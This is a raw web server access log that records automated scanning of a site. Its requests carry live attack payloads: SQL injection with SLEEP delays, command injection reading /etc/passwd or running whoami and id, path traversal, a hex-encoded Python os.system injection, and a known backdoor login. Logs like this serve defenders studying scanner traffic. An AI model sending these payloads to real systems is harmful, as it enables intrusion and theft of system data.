205.185.122.202 - - [19/Oct/2025:15:35:27 +0530] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:15:35:27 +0530] "POST /mailingupgrade.php HTTP/1.1" 404 1030
124.198.131.83 - - [19/Oct/2025:15:35:27 +0530] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 1044
124.198.131.83 - - [19/Oct/2025:15:35:27 +0530] "POST /diagnostic.php HTTP/1.1" 404 -
205.185.122.202 - - [19/Oct/2025:15:35:27 +0530] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 1094
124.198.131.83 - - [19/Oct/2025:15:35:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:35:28 +0530] "POST /mailingupgrade.php HTTP/1.1" 404 1030
124.198.131.83 - - [19/Oct/2025:15:35:28 +0530] "GET /HNAP1/ HTTP/1.1" 404 1006
124.198.131.83 - - [19/Oct/2025:15:35:28 +0530] "POST /goform/SystemCommand HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:15:36:50 +0530] "GET /public/login.htm?type=probes HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:36:50 +0530] "GET /public/login.htm?type=probes HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:36:52 +0530] "GET /public/login.htm?type=requests HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:36:53 +0530] "GET /public/login.htm?type=requests HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:36:55 +0530] "GET /public/login.htm?type=treestat HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:36:56 +0530] "GET /public/login.htm?type=treestat HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:37:22 +0530] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:37:23 +0530] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:37:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:37:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:37:38 +0530] "GET /api/experimental/test HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:37:39 +0530] "GET /api/experimental/test HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:37:40 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:37:40 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:37:41 +0530] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:15:37:41 +0530] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:15:37:44 +0530] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:15:37:45 +0530] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:15:37:49 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:37:49 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:37:51 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:37:51 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:38:15 +0530] "POST /installer/index.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:38:15 +0530] "POST /installer/index.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:38:18 +0530] "POST /roundcube/installer/index.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:38:18 +0530] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:15:38:18 +0530] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:15:38:18 +0530] "POST /roundcube/installer/index.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:38:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:38:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:38:33 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/34HFRUBOjYsg9bO1h8ag42UHmRZ.txt HTTP/1.1" 404 1154
205.185.122.202 - - [19/Oct/2025:15:38:33 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/34HFRUBOjYsg9bO1h8ag42UHmRZ.txt HTTP/1.1" 404 1154
205.185.122.202 - - [19/Oct/2025:15:39:06 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:39:06 +0530] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d7a5249526c4a52547a6872544763325a55564651544279557a686d4e3051785a6b526a22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:39:06 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:15:39:06 +0530] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d7a5249526c4a52547a6872544763325a55564651544279557a686d4e3051785a6b526a22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:39:08 +0530] "GET /webadmin/out HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:39:08 +0530] "GET /webadmin/out HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:39:27 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:27 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:27 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:27 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:27 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:28 +0530] "POST /module/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:39:49 +0530] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:39:50 +0530] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:39:52 +0530] "GET /wp-json/wp/v2/comments HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:39:52 +0530] "GET /wp-json/wp/v2/comments HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:39:54 +0530] "POST /lib/crud/userprocess.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:39:54 +0530] "POST /lib/crud/userprocess.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:39:54 +0530] "POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:15:39:55 +0530] "POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:15:39:57 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:39:57 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:39:59 +0530] "POST /lib/crud/userprocess.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:40:00 +0530] "POST /lib/crud/userprocess.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:40:13 +0530] "GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:40:13 +0530] "GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:40:20 +0530] "POST /context.json HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:40:21 +0530] "POST /context.json HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:40:36 +0530] "POST /apisix/admin/routes HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:40:36 +0530] "POST /apisix/admin/routes HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:15:40:39 +0530] "GET /34HFRmk1FfBbzuMizV4BQDMb49B?cmd=id HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:40:39 +0530] "GET /34HFRmk1FfBbzuMizV4BQDMb49B?cmd=id HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:40:51 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:40:51 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:40:54 +0530] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:40:55 +0530] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:41:12 +0530] "POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:15:41:13 +0530] "POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:15:41:49 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:41:49 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:42:00 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:42:00 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:42:06 +0530] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Evmtt.txt HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:42:06 +0530] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Evmtt.txt HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:42:09 +0530] "GET /include/vmtt.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:42:10 +0530] "GET /include/vmtt.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:42:55 +0530] "POST /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:15:42:55 +0530] "POST /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:15:43:29 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:43:29 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:43:32 +0530] "GET /fuel/login/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:43:32 +0530] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:43:32 +0530] "POST /fuel/login/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:43:32 +0530] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:43:32 +0530] "GET /fuel/login/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:43:33 +0530] "POST /fuel/login/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:43:54 +0530] "GET /tiki-login_scr.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:43:54 +0530] "GET /tiki-login_scr.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:43:59 +0530] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:44:00 +0530] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:44:05 +0530] "GET /tiki-login_scr.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:44:05 +0530] "GET /tiki-login_scr.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:44:12 +0530] "GET /tiki-index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:44:13 +0530] "GET /tiki-index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:44:35 +0530] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:44:35 +0530] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:44:40 +0530] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:44:40 +0530] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:45:02 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:45:02 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:45:07 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:45:07 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:45:08 +0530] "POST /jars/upload HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:45:08 +0530] "POST /jars/upload HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:45:12 +0530] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 1216
205.185.122.202 - - [19/Oct/2025:15:45:12 +0530] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 1216
205.185.122.202 - - [19/Oct/2025:15:45:34 +0530] "GET /user/login.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:45:35 +0530] "GET /user/login.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:45:37 +0530] "GET /global-protect/login.esp HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:45:38 +0530] "GET /global-protect/login.esp HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:47:33 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:47:34 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:47:39 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:47:40 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:48:09 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:48:10 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:15:48:54 +0530] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:48:54 +0530] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:48:55 +0530] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:48:55 +0530] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:48:58 +0530] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:15:48:58 +0530] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:15:49:32 +0530] "GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:49:33 +0530] "GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:49:35 +0530] "GET /?p=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:49:35 +0530] "GET /?p=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:50:40 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:50:40 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:50:44 +0530] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:50:45 +0530] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:50:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:50:51 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:50:52 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:50:52 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:50:57 +0530] "POST /checkValid HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:50:57 +0530] "POST /checkValid HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:50:57 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:15:50:57 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:15:51:01 +0530] "GET /public/css/34HFSXhU6W1MOFplzGwBQYWdt5H.css HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:51:02 +0530] "GET /public/css/34HFSXhU6W1MOFplzGwBQYWdt5H.css HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:51:11 +0530] "POST /SearchSvc/CVSearchService.svc HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:51:11 +0530] "POST /SearchSvc/CVSearchService.svc HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:51:17 +0530] "POST /assets/_core/php/profile.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:51:18 +0530] "POST /assets/_core/php/profile.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:51:22 +0530] "POST /assets/php/profile.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:51:22 +0530] "POST /assets/php/profile.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:51:27 +0530] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:15:51:27 +0530] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 404 1080
87.120.191.84 - - [19/Oct/2025:15:51:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:52:02 +0530] "PUT /v1/kv/34HFSD0PRqecZb8XMOaeTCONfQZ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:15:52:02 +0530] "PUT /v1/kv/34HFSD0PRqecZb8XMOaeTCONfQZ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:15:52:05 +0530] "GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1" 404 1100
205.185.122.202 - - [19/Oct/2025:15:52:05 +0530] "GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1" 404 1100
205.185.122.202 - - [19/Oct/2025:15:52:06 +0530] "GET /v1/kv/34HFSD0PRqecZb8XMOaeTCONfQZ?raw HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:52:07 +0530] "GET /v1/kv/34HFSD0PRqecZb8XMOaeTCONfQZ?raw HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:53:10 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:53:10 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:53:40 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:53:40 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:15:53:49 +0530] "POST /service/v1/createUser HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:53:49 +0530] "POST /service/v1/createUser HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:54:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:54:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:54:27 +0530] "GET /wp-content/plugins/loginizer/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:15:54:28 +0530] "GET /wp-content/plugins/loginizer/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:15:54:43 +0530] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:54:43 +0530] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:55:42 +0530] "GET /tos/index.php?user/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:55:42 +0530] "GET /tos/index.php?user/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:55:46 +0530] "POST /wizard/initialise.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:55:46 +0530] "POST /wizard/initialise.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:56:12 +0530] "POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:15:56:12 +0530] "POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:15:56:42 +0530] "POST /convert HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:56:43 +0530] "POST /convert HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:56:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:56:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:56:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:56:46 +0530] "GET /file/w4w8EO.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:56:46 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:56:47 +0530] "GET /file/w4w8EO.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:56:50 +0530] "GET /server-common/cgi-bin/login HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:56:52 +0530] "GET /server-common/cgi-bin/login HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:57:10 +0530] "POST /assets/php/upload.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:57:10 +0530] "POST /assets/php/upload.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:57:16 +0530] "GET /assets/data/usrimg/34hfqxntlsyrfbfkvzzxapdharw.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:15:57:16 +0530] "GET /assets/data/usrimg/34hfqxntlsyrfbfkvzzxapdharw.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:15:57:21 +0530] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:15:57:22 +0530] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:15:58:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:58:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:58:38 +0530] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:58:38 +0530] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW HTTP/1.1" 404 1026
204.76.203.15 - - [19/Oct/2025:15:58:54 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:59:16 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:59:16 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:59:27 +0530] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:59:27 +0530] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:59:29 +0530] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:59:30 +0530] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:59:32 +0530] "GET /ext-js/index.html HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:59:33 +0530] "GET /ext-js/index.html HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:59:34 +0530] "GET /upload/userfiles/image/34HFQk8eE9PHZgRj3DOGqa7Aa5P.png HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:15:59:34 +0530] "GET /upload/userfiles/image/34HFQk8eE9PHZgRj3DOGqa7Aa5P.png HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:15:59:37 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:59:37 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:59:41 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:59:41 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
204.76.203.15 - - [19/Oct/2025:15:59:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:00:08 +0530] "POST /actions/authenticate.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:00:09 +0530] "POST /actions/authenticate.php HTTP/1.1" 404 1042
